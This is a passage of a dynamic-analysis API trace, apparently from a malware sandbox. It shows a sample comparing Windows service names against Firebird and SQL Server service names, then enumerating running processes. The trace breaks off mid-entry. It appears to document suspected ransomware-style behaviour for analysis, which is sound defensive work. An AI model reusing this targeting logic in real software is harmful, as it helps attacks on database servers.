[0159.451] lstrlenW (lpString="CDPSvc") returned 6 [0159.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0159.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0159.451] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0159.451] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0159.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0159.451] lstrlenW (lpString="ClickToRunSvc") returned 13 [0159.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0159.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0159.452] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0159.452] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0159.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0159.452] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0159.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0159.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0159.453] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0159.453] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0159.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0159.453] lstrlenW (lpString="CryptSvc") returned 8 [0159.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0159.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0159.453] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0159.454] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0159.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0159.454] lstrlenW (lpString="DcomLaunch") returned 10 [0159.454] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0159.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0159.454] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0159.454] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0159.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0159.455] lstrlenW (lpString="DeviceAssociationService") returned 24 [0159.455] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0159.455] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0159.455] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0159.455] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0159.455] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0159.455] lstrlenW (lpString="Dhcp") returned 4 [0159.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0159.456] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0159.456] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0159.456] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0159.456] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0159.456] lstrlenW (lpString="Dnscache") returned 8 [0159.456] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0159.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0159.457] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0159.457] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0159.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0159.457] lstrlenW (lpString="DPS") returned 3 [0159.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0159.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0159.457] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0159.457] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0159.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0159.458] lstrlenW (lpString="DusmSvc") returned 7 [0159.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0159.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0159.458] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0159.458] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0159.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0159.458] lstrlenW (lpString="EventLog") returned 8 [0159.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0159.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0159.459] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0159.459] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0159.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0159.459] lstrlenW (lpString="EventSystem") returned 11 [0159.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0159.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0159.459] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0159.459] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0159.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0159.460] lstrlenW (lpString="FontCache") returned 9 [0159.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0159.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0159.655] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0159.655] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0159.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0159.655] lstrlenW (lpString="gpsvc") returned 5 [0159.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0159.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0159.655] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0159.655] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0159.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0159.656] lstrlenW (lpString="iphlpsvc") returned 8 [0159.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0159.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0159.656] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0159.656] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0159.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0159.661] lstrlenW (lpString="KeyIso") returned 6 [0159.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0159.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0159.681] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0159.681] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0159.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0159.681] lstrlenW (lpString="LanmanServer") returned 12 [0159.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0159.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0159.681] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0159.681] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0159.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0159.681] lstrlenW (lpString="LanmanWorkstation") returned 17 [0159.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0159.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0159.681] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0159.681] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0159.681] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0159.681] lstrlenW (lpString="lfsvc") returned 5 [0159.681] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0159.681] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0159.682] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0159.682] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0159.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0159.682] lstrlenW (lpString="lmhosts") returned 7 [0159.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0159.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0159.682] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0159.682] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0159.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0159.682] lstrlenW (lpString="LSM") returned 3 [0159.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0159.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0159.682] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0159.682] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0159.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0159.682] lstrlenW (lpString="MpsSvc") returned 6 [0159.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0159.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0159.682] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0159.682] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0159.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0159.682] lstrlenW (lpString="NcbService") returned 10 [0159.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0159.682] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0159.682] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0159.682] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0159.682] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0159.682] lstrlenW (lpString="netprofm") returned 8 [0159.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0159.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0159.683] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0159.683] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0159.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0159.683] lstrlenW (lpString="NgcSvc") returned 6 [0159.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0159.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0159.683] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0159.683] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0159.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0159.683] lstrlenW (lpString="NlaSvc") returned 6 [0159.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0159.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0159.683] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0159.683] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0159.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0159.683] lstrlenW (lpString="nsi") returned 3 [0159.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0159.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0159.683] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0159.683] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0159.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0159.683] lstrlenW (lpString="PcaSvc") returned 6 [0159.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0159.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0159.683] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0159.683] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0159.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0159.684] lstrlenW (lpString="PlugPlay") returned 8 [0159.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0159.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0159.684] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0159.684] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0159.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0159.684] lstrlenW (lpString="Power") returned 5 [0159.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0159.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0159.684] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0159.684] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0159.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0159.684] lstrlenW (lpString="ProfSvc") returned 7 [0159.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0159.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0159.684] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0159.684] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0159.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0159.684] lstrlenW (lpString="RpcEptMapper") returned 12 [0159.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0159.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0159.684] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0159.684] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0159.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0159.684] lstrlenW (lpString="RpcSs") returned 5 [0159.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0159.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0159.685] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0159.685] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0159.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0159.685] lstrlenW (lpString="SamSs") returned 5 [0159.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0159.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0159.685] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0159.685] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0159.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0159.685] lstrlenW (lpString="Schedule") returned 8 [0159.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0159.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0159.685] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0159.685] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0159.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0159.685] lstrlenW (lpString="SecurityHealthService") returned 21 [0159.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0159.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0159.685] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0159.685] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0159.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0159.685] lstrlenW (lpString="SENS") returned 4 [0159.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0159.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0159.685] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0159.685] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0159.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0159.685] lstrlenW (lpString="ShellHWDetection") returned 16 [0159.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0159.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0159.686] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0159.686] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0159.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0159.686] lstrlenW (lpString="Spooler") returned 7 [0159.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0159.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0159.686] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0159.686] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0159.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0159.686] lstrlenW (lpString="StateRepository") returned 15 [0159.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0159.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0159.686] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0159.686] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0159.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0159.686] lstrlenW (lpString="SysMain") returned 7 [0159.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0159.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0159.686] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0159.686] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0159.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0159.686] lstrlenW (lpString="SystemEventsBroker") returned 18 [0159.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0159.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0159.686] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0159.686] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0159.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0159.687] lstrlenW (lpString="Themes") returned 6 [0159.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0159.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0159.687] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0159.687] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0159.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0159.687] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0159.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0159.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0159.687] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0159.687] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0159.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0159.687] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0159.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0159.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0159.687] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0159.687] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0159.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4579f08 | out: hHeap=0x6a0000) returned 1 [0159.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x42c [0159.692] Process32FirstW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.693] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0159.693] lstrlenW (lpString="System") returned 6 [0159.694] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0159.695] lstrlenW (lpString="smss.exe") returned 8 [0159.695] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0159.696] lstrlenW (lpString="csrss.exe") returned 9 [0159.696] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0159.697] lstrlenW (lpString="wininit.exe") returned 11 [0159.697] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0159.697] lstrlenW (lpString="csrss.exe") returned 9 [0159.697] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0159.698] lstrlenW (lpString="winlogon.exe") returned 12 [0159.698] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0159.699] lstrlenW (lpString="services.exe") returned 12 [0159.699] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0159.700] lstrlenW (lpString="lsass.exe") returned 9 [0159.700] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0159.701] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0159.701] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0159.702] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0159.702] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.703] lstrlenW (lpString="svchost.exe") returned 11 [0159.703] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0159.703] lstrlenW (lpString="svchost.exe") returned 11 [0159.704] Process32NextW (in: hSnapshot=0x42c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, 